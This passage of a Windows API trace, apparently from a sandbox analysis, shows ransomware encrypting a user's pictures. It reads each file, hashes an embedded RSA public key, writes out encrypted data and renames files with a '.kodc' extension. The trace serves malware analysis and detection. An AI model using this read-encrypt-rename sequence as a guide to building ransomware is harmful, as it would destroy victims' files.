out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.420] GetCurrentThreadId () returned 0x42c [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba53d8 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.421] GetCurrentThreadId () returned 0x42c [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.421] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.421] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aef8 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.422] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.422] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.423] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ae98 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9ba88 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.423] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.424] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0xe3e1, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xe3e1, lpOverlapped=0x0) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.424] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe3e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.424] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.424] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.424] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.424] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.425] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.425] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.425] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.425] CloseHandle (hObject=0x5cc) returned 1 [0099.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.430] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.430] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.430] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B_pNpXiarzzW85.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b_pnpxiarzzw85.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B_pNpXiarzzW85.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b_pnpxiarzzw85.gif.kodc")) returned 1 [0099.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.431] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.431] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.432] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe813a010, ftCreationTime.dwHighDateTime=0x1d5c1fb, ftLastAccessTime.dwLowDateTime=0x96505800, ftLastAccessTime.dwHighDateTime=0x1d5b67e, ftLastWriteTime.dwLowDateTime=0x96505800, ftLastWriteTime.dwHighDateTime=0x1d5b67e, nFileSizeHigh=0x0, nFileSizeLow=0xe71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cIdoFCqOwklL.jpg", cAlternateFileName="CIDOFC~1.JPG")) returned 1 [0099.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.432] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.432] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.432] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cIdoFCqOwklL.jpg") returned=".jpg" [0099.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cIdoFCqOwklL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cidofcqowkll.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.432] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=59166) returned 1 [0099.432] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.436] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe6f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.436] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.437] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.437] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe71e, lpOverlapped=0x0) returned 1 [0099.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.438] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.439] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.439] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.439] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.439] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.439] GetLastError () returned 0x0 [0099.439] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.439] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.439] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.439] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.439] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe720) returned 0x9ba6d90 [0099.440] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9ba88 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bad0 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.441] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aef8 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aee0 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.441] 